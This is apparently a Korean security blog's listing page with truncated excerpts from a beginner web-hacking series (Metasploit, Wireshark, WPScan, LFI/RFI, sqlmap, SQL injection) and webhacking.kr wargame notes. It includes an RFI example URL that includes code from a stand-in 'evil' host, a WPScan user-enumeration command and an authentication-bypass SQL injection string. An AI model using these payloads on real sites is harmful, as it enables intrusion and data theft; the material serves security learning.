웹 해킹84 [웹 해킹 입문] 7. Metasploit Metasploit 메타스플로잇은 방대한 취약점 DB를 이용하여 악성 코드를 작성하여 배포한다. 메타스플로잇의 가장 큰 특징은 내부 프레임워크를 사용하여 쉽게 익스플로잇 코드를 만든다는 점이다.즉, 우리가 하나하나 코딩할 필요가 없다는 뜻이다. 바로 바이러스로 인식! 2018. 1. 16. [웹 해킹 입문] 6. WireShark WireShark 네트워크 패킷을 캡처하고 분석하는 오픈소스 도구 PCAP(Packet Capture)은 네트워크 트래픽을 캡처하는 API 구성이다.와이어샤크는 자체 프로그램으로 네트워크 트래픽을 캡쳐하는 것이 아니고, 운영체제에서 지원하는 캡처 라이브러리를 이용하여 수집! 스니핑은 네트워크 패킷을 잡는 기술을 말한다. 네트워크 카드-Normal Mode-Promiscuous Mode pcapng포맷으로 로그인성공시 와이어샤크로 캡처하고 저장한다. 2018. 1. 16. [웹 해킹 입문] 5. 스캔 해킹 전에 시스템의 상태를 파악할 수 있는 도구!->스캐닝 도구! 스캐닝 도구는 서버의 상태, 사양, 취약점 및 각종 정보를 쉽게 탐색보완환경이 잘 갖춰진 조직이나 기관은 이러한 도구의 사용을 바로 탐지할 수 있는 장비를 갖춤 주요스캐닝 도구-> WPSCAN, Nmap, Nikto, Netcat 1) WPSCAN WPScan은워드프레스 관련 취약점을 점검하는 도구이다. 워드프레스를 위한 전용 점검 도구로 간단한 명령으로 많은 취약점을 파악한다.WPScan은 기존의 취약점을 데이터베이스화하여 사용자에게 취약 정보를 제공한다. wpscan --url ~~~ --enumerate p //해당 워드프레스에 설치된 플러그인을 열거한다wpscan --url ~~~ --enumerate u //user name:id.. 2018. 1. 16. [웹 해킹 입문] 4. LFI&RFI LFI&RFI LFI 와 RFI는 Local과 Remote에 대한 File Inclusion(파일 포함) 을 말한다. 해킹으로 말하자면, LFI와 RFI를 이용하여 웹 서버에 악성 코드를 넣는 기법이다. 가장 대표적인 것이 PHP의 include함수이다.이 함수의 역할은 특정 파일을 포함시켜 스크립트를 실행한다. vars.php의 소스코드는 다음과 같다! 또한 include함수는 php가 아닌 텍스트도 동일하게 포함시켜 실행한다. LFI: 서버에 FTP나 자료실로 악성 코드를 업로드시켜 include 시킴vulnerable.php?COLOR=C:\\ftp\upload\\exploit.txt RFI: 외부서버의 악성코드를 불러와 include 시킴vulnerable.php?COLOR=http://evil... 2018. 1. 15. sqlmap sqlmap 여러 SQL 구문의 조합을 통해->sql injectionsqlmap은 파이썬으로 개발된 오픈소스사이트 url을 통해 SQL인젝션 취약점을 찾는다. 디비 완전 다 뚫림!! 취약점으로 인해 다른 테이블까지 다 뚫렸다! 비밀번호 dictionary attack까지 해준다! 2018. 1. 15. [웹 해킹 입문] 3. SQL 인젝션 SQL 인젝션-인증우회-기밀데이터 접근-웹 사이트 콘텐츠 변경-DB 서버 shutdown 특수문자를 입력하여 SQL 인젝션 실행작은따옴표('), 주석 처리에 사용하는 하이픈(-) PHP에서는 작은따옴표의 취약점을 막도록 다음과 같이 2가지를 지원한다.1) 함수 addslashes()를 이용하여 작은따옴쵸 기호 앞에 역슬래시(\) 추가2) php.ini의 magic_quotes_gpc 옵션 활성화(On)->get, post, cookie를 사용하여 넘어온 변숫값에 quotes(',",\, NULL등)가 있으면 자동으로 앞에 역슬래시(\)를 붙인다. 1. ' or '1'='1select user_login, user_pass, user_email FROM wp_userswhere user_login='' o.. 2018. 1. 8. [웹 해킹 입문] 1. 웹해킹 개요 웹해킹 입문 서적을 참고했습니다. 웹(www): 인터넷에 연결된 컴퓨터들을 통해 사람들이 정보를 공유할 수 있는 전 세계적인 정보공간 웹: 네트워크 기술의 한 분야로 지구상에서 가장 거대한 네트워크이다.인터넷: TCP/IP라는 프로토콜을 사용하는 네트워크의 집합체, 웹은 그 안에서 이루어지는 서비스 이더넷(Ethernet): 랜(LAN)이라고 하며, 일반적으로 가정, 소규모 사업장에서 가장 많이 쓰이는 네트워크 기술리피터(Repeater): 약한 신호를 좀 더 멀리 보내기 위한 중계기허브(Hub): 컴퓨터들을 랜 환경에 접속시키는 네트워크 장비 초창기: 사용자 한 명이 자신의 컴퓨터만을 다루었다. 이때는 네트워크 개념이 없었다.->네트워크 구성이 가능한 시절: 일부 컴퓨터들이 모여 이더넷(LAN)이라는 .. 2018. 1. 8. webhacking.kr 17번 처음에는 매우 간단하다고 생각하다.실로... 매우 간단하기는 하다! 하지만 착각을 한 것은 당연히 int계산이라고 생각했다는 점이다! 이를 깨달은 것은 실제로 메모장에 이 html코드를 만들어서 그 값을 출력했다!! 이를 통해 결과 9997809307를 얻을 수 있다!! 2017. 5. 9. webhacking.kr 16번 HTTP/1.1 200 OKServer: nginxDate: Mon, 08 May 2017 19:31:07 GMTContent-Type: text/htmlConnection: closeVary: Accept-EncodingP3P: CP='NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE'Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheContent-Length: 880 Challenge 16* 이상한 별이 보이는데, 밑에 있는 세번째 별은 색.. 2017. 5. 9. 이전 1 ··· 6 7 8 9 10 다음
